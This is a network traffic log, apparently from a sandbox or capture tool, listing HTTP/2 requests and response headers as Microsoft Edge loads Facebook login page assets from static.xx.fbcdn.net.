last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 30 Oct 2024 15:05:29 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: htmcZqmuwSJp+KZ6fmwakg==
x-fb-debug: BQfPJU5fvEHbEQXL85qZY8FcF70BrqGMQ+fIbZTU27jQZgD20zIz0ny6bWDSbJ1TmjHWtJyypemG6aEF2P6J0A==
content-length: 4954
date: Fri, 03 Nov 2023 04:49:47 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yD/l/0,cross/pN9tJT8IYyK.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yD/l/0,cross/pN9tJT8IYyK.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 30 Oct 2024 16:25:14 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: /LhcGDOi/LufxTTE1A1nyg==
x-fb-debug: hrnT+qk//qcZcuxbQTjJPQbMUsjd0lAYg3BWGfS6agcL3mnmxsNIPn19TH4kGQLJcaSZMacamNPgH9JJfaqV8w==
content-length: 7462
date: Fri, 03 Nov 2023 04:49:48 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/2vQr9XaGVSF.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yS/l/0,cross/2vQr9XaGVSF.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 30 Oct 2024 15:05:29 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: AUwSAJHjQeqOHt9Xas/ggQ==
x-fb-debug: K87WM1IhNPhUdDdt1iyJmkwegEu3/I7qnfbv0QZDCQp8vf4kki0m0BsVOnDF8ji00IdrA8ig/xQN1LyQx5ilPw==
content-length: 151
date: Fri, 03 Nov 2023 04:49:48 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0,cross/fhrZ5QrtjNj.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/y2/l/0,cross/fhrZ5QrtjNj.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 26 Oct 2024 15:37:17 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: VcVCofLZlfWi6ojYtmNXmg==
x-fb-debug: JxaTyRbnA0oWSPaIatuaB1jBXQVodcNfAPso6D4tS2pdCf7npJe3VhgeZQ8ZaZ2N0Mdb7KdMe1NRba0N4yNHBg==
content-length: 3595
date: Fri, 03 Nov 2023 04:49:48 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yO/l/0,cross/iZvscNuQFSs.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yO/l/0,cross/iZvscNuQFSs.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 01 Nov 2024 18:05:53 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: wYChLVsp5A9IepmZ5HkFkg==
x-fb-debug: WldFyThbiQ5PrBXVbUTycUmjokrfa+ETuiMvncfUNUPVWYHxefBrLWTVBmzWImtWEU8Rf4n3RALHoU3DX2bLBw==
content-length: 1310
date: Fri, 03 Nov 2023 04:49:49 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yx/l/0,cross/7O04Eyj-1fg.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yx/l/0,cross/7O04Eyj-1fg.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 21 Oct 2024 15:24:54 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: 6ji8I7RRs3eVPZ9t/zQwtA==
x-fb-debug: C5QCaImt8G7SjxIMS4U0JL+0HTNOnX7PFHn9kIGX/oByIECoZLRJ0iRZf6haZL481iMKw2l+SVYaybbwUOLueQ==
content-length: 247
date: Fri, 03 Nov 2023 04:49:49 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/EhJ0QrY2FBP.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yU/r/EhJ0QrY2FBP.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.facebook.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: image/svg+xml
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Tue, 22 Oct 2024 23:08:46 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
x-fb-optimizer: 0
content-md5: mOuWB7wXlE6XUTOVRHYuCQ==
x-fb-debug: +ANWoOAxwQ0cDptmOp2Ad1h6Hrg2ug2csLXgGpW4/3trBQk7CmEX2Aam2OtKCG5uwwqBDSOyXG38AAzoUvCY/w==
content-length: 956
date: Fri, 03 Nov 2023 04:49:49 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/y1/r/4lCu2zih0ca.svg HTTP/2.0
host: static.xx.fbcdn.net
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 30 Oct 2024 22:16:32 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: 9jXa8z4KNL83MYoq4WIezg==
x-fb-debug: sIstfs8H/1vyvlYU+Ncm/S+1iuqXsej+1yPWUYA5etnqc/5Ow9ltujozBiEIC1nTJkHgpcj7vap+NTnf6Nr71Q==
content-length: 104477
date: Fri, 03 Nov 2023 04:49:49 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yp/r/gC0mb5XShS_.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yp/r/gC0mb5XShS_.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 24 Oct 2024 14:38:03 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: oxOhIUf98vAPhdsTZElQbg==
x-fb-debug: x+S89oZPFVqTpVvMaO3pPV/BxKf/+evlHD5yeSoVtApbr3BY7lpJyZKJ0BNCnYzlTlStRWcqakDMpWKCUidnog==
content-length: 9624
date: Fri, 03 Nov 2023 04:50:00 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/v75M7CPu9-P.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yt/r/v75M7CPu9-P.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 26 Oct 2024 09:11:32 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: wfJUFlnC3nzcjOp5Pt1Rqg==
x-fb-debug: LV9+3vYPyVpZCK9Qus2xxoSLSRLQ+OlzqlGF9EHj9GG2ayHCsoLKkJ5j5iNfFUMBEClzd6cXsk1dmyIkq5A9ew==
content-length: 8670
date: Fri, 03 Nov 2023 04:50:00 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yz/r/fiUTTh4d_Lr.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yz/r/fiUTTh4d_Lr.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Tue, 29 Oct 2024 00:00:18 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: Qg7sJKqPfguQDMimuAsFXQ==
x-fb-debug: noYnXb26/VINeOJ5hT4gfCDzP6TtmmHJ6UkttlDDlwnP3Hw6SDpGhBo++n8Ha33mr6PozInAi8q4p+BsD/wA1Q==
content-length: 249
date: Fri, 03 Nov 2023 04:50:00 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yy/l/en_US/fVsT0Ugl-s1.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3i7M54/yy/l/en_US/fVsT0Ugl-s1.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 30 Oct 2024 16:13:56 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: NLddtCtqwzMTLpZ3RWMNsQ==
x-fb-debug: Cz0auErkw/qImY9wk0uckR5OupnEE54I7fKR55RJ8bu7NVwKGzb8u8sakPlpXqV+7agzMJ8vbqQSi2//mC2Arg==
content-length: 1647
date: Fri, 03 Nov 2023 04:50:00 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/0ZOQmhGCKxB.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yT/r/0ZOQmhGCKxB.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 27 Oct 2024 15:37:48 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: KhocWu2P7GO5RUxc9pyOlg==
x-fb-debug: pSaf5fMd8GyOWydRiGmcvKaEoYCGL6shZX+Pv5sgnsAOZs0pVoLcJ8Cb6TuoYCZajRnPUpSmV1eWRvG8fu3AbA==
content-length: 385
date: Fri, 03 Nov 2023 04:50:00 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/y8/l/0,cross/GkniLnsECe7.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/y8/l/0,cross/GkniLnsECe7.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 01 Nov 2024 18:05:53 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: v/dZMU2UIvWZChi+oL3iig==
x-fb-debug: HF2Akv6u8MkUBh3VSxakrozla3ofRmpoT0bwVnNyfmOvfR5Peoqvkzjm74T5j+WAka8lDmcdepCZBTw/K9haOw==
content-length: 2969
date: Fri, 03 Nov 2023 04:50:00 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/y7/l/0,cross/L9qs_fzO9uB.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/y7/l/0,cross/L9qs_fzO9uB.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Tue, 29 Oct 2024 23:10:41 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: NFvRSKJjWawODn6vZLFtwg==
x-fb-debug: MW1+0OpjaDBfRIGIAj7wYOlGBmZaiPm7ZImrngI0m3bZoCsdde9nA3v8NaKnPzeohDm0QybJ0xt0psspgr9l9w==
content-length: 14434
date: Fri, 03 Nov 2023 04:50:00 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yx/l/0,cross/JP2GMn4f0fs.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yx/l/0,cross/JP2GMn4f0fs.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 01 Nov 2024 18:05:53 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: l5Nd02ZOpdDX5nRqniGFtA==
x-fb-debug: it8VlWC4pFLvJ3gKPmbEckZnJtA+siNgEP+KUg51jOUWw42ZPcVGxvd2YtCHruZbDklOCa1h74etPF8+lbzDNQ==
content-length: 265
date: Fri, 03 Nov 2023 04:50:00 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/O7nelmd9XSI.png

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yU/r/O7nelmd9XSI.png HTTP/2.0
host: static.xx.fbcdn.net
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
content-md5: OcEdZWIg79UvSWVADRSQCg==
expires: Tue, 29 Oct 2024 15:56:20 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
x-fb-debug: /z9h8bn+NCLQOl3V3UY/uUUW36qaiYChh381VDDa9BVF1iEpN5Zbiu7Obo0rey3mq/wUQW2cowxq6rSBmzhjZw==
content-length: 95
date: Fri, 03 Nov 2023 04:50:00 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yz/r/1jo5ZChBkzZ.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yz/r/1jo5ZChBkzZ.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 24 Oct 2024 14:38:03 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: tV/tvrjhb0oNwoXHhZ+21w==
x-fb-debug: Hb9/gKZ0Ktt986M4fcrF6TIuYgIX85gM1W+Hk5NMLRrWOKbUQKNwQh1GwRVTZYITiLWWuOPlpjkdgrNpeOzZsw==
content-length: 2048
date: Fri, 03 Nov 2023 04:50:10 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yJ/r/a1OLcVhluEP.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yJ/r/a1OLcVhluEP.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 01 Nov 2024 03:01:42 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
